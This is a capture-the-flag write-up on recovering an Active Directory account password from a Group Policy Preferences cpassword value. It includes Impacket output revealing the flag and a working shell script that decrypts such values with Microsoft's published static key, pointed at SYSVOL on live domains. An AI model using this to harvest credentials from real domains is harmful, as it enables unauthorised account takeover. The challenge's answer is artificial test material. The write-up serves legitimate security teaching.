Statement: Looks like the attacker managed to access the rebels' Domain Controller.

Can you figure out how they got access after pulling these artifacts from one of our Outpost machines?


The challenge provides an archive containing several GPOs.

Inspecting the GPOs, I quickly notice a cpassword attribute in one of the Group Policy Preferences XML files (Machine/Preferences/Groups/Groups.xml):

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup" image="2" changed="2024-06-12 14:26:50" uid="{CE475804-94EA-4C12-8B2E-2B3FFF1A05C4}">
    <Properties action="U" newName="" fullName="" description="" cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Backup"/>
  </User>
</Groups>

Impacket ships a Get-GPPPassword example script that decodes and decrypts the value. There is no secret to recover here: cpassword is AES-256-CBC ciphertext under a static key that Microsoft itself published in the MS-GPPREF specification, and the policy XML lives in SYSVOL, which every authenticated domain user can read:

# impacket-Get-GPPPassword -xmlfile Groups.xml LOCAL

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Found a Groups XML file:
[*]   file      : Machine/Preferences/Groups/Groups.xml
[*]   newName   : 
[*]   userName  : Backup
[*]   password  : DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}
[*]   changed   : 2024-06-12 14:26:50
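To show what Get-GPPPassword does under the hood, here is an added example of my own (not part of the original writeup and not Impacket's code) that decrypts a cpassword with nothing but openssl: the 32-byte AES key is the one Microsoft published in MS-GPPREF, the IV is sixteen zero bytes, the base64 text has its '=' padding stripped, and the decrypted bytes are the password in UTF-16LE. It assumes openssl (and preferably iconv) are on PATH; the embedded Groups.xml is the file shown above, and the function names decrypt_cpassword, list_cpasswords and run_demo are mine.

```shell
#!/bin/sh
# Offline decryption of Group Policy Preferences cpassword values.
# The AES-256-CBC key is static and published by Microsoft in MS-GPPREF
# (section 2.2.1.1.4); the IV is sixteen zero bytes. Anyone who can read
# the policy XML therefore recovers the plaintext password.
# Assumes: openssl (and ideally iconv) on PATH. Not Impacket's code.
GPP_AES_KEY="4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
GPP_AES_IV="00000000000000000000000000000000"

# GPP stores the password as UTF-16LE. Convert with iconv when present;
# otherwise strip the NUL bytes, which is exact for ASCII-only passwords.
utf16le_to_utf8() {
    if command -v iconv >/dev/null 2>&1; then
        iconv -f UTF-16LE -t UTF-8
    else
        tr -d '\000'
    fi
}

# Decrypt one cpassword string and print the plaintext password.
decrypt_cpassword() {
    cpw=$1
    # GPP drops the '=' padding from the base64 text; restore it first.
    case $(( ${#cpw} % 4 )) in
        2) cpw="${cpw}==" ;;
        3) cpw="${cpw}=" ;;
    esac
    printf '%s' "$cpw" \
        | openssl base64 -d -A \
        | openssl enc -d -aes-256-cbc -K "$GPP_AES_KEY" -iv "$GPP_AES_IV" \
        | utf16le_to_utf8
}

# Print "userName<TAB>cpassword" for every Properties element that carries
# a cpassword attribute in a GPP XML file (Groups.xml, Drives.xml, ...).
list_cpasswords() {
    grep -o '<Properties [^>]*cpassword="[^"]*"[^>]*>' "$1" \
    | while IFS= read -r props; do
        cpw=$(printf '%s' "$props" | sed 's/.*cpassword="\([^"]*\)".*/\1/')
        # Other preference types name the account differently (for example
        # runAs in ScheduledTasks.xml), so tolerate a missing userName.
        user=$(printf '%s' "$props" | sed -n 's/.*userName="\([^"]*\)".*/\1/p')
        printf '%s\t%s\n' "${user:-<no userName>}" "$cpw"
    done
}

# Stand-alone run: the Groups.xml from the challenge archive (copied from
# the writeup above) is written to a temp file and every cpassword decrypted.
run_demo() {
    xml=$(mktemp)
    cat > "$xml" <<'EOF'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Backup" image="2" changed="2024-06-12 14:26:50" uid="{CE475804-94EA-4C12-8B2E-2B3FFF1A05C4}"><Properties action="U" newName="" fullName="" description="" cpassword="B+iL/dnbBHSlVf66R8HOuAiGHAtFOVLZwXu0FYf+jQ6553UUgGNwSZucgdz98klzBuFqKtTpO1bRZIsrF8b4Hu5n6KccA7SBWlbLBWnLXAkPquHFwdC70HXBcRlz38q2" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="Backup"/></User>
</Groups>
EOF
    list_cpasswords "$xml" | while IFS="$(printf '\t')" read -r user cpw; do
        printf '%s : %s\n' "$user" "$(decrypt_cpassword "$cpw")"
    done
    rm -f "$xml"
}

run_demo
```

On a live engagement, point list_cpasswords at any preference XML pulled from \\<dc>\SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\ (or the User\ tree). The static key is why MS14-025 removed the ability to set these passwords in the Group Policy editor but did nothing to values already sitting in SYSVOL; any cpassword you find on a domain today should be treated as an already-compromised credential.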

Flag: DUCTF{D0n7_Us3_P4s5w0rds_1n_Gr0up_P0l1cy}

Source: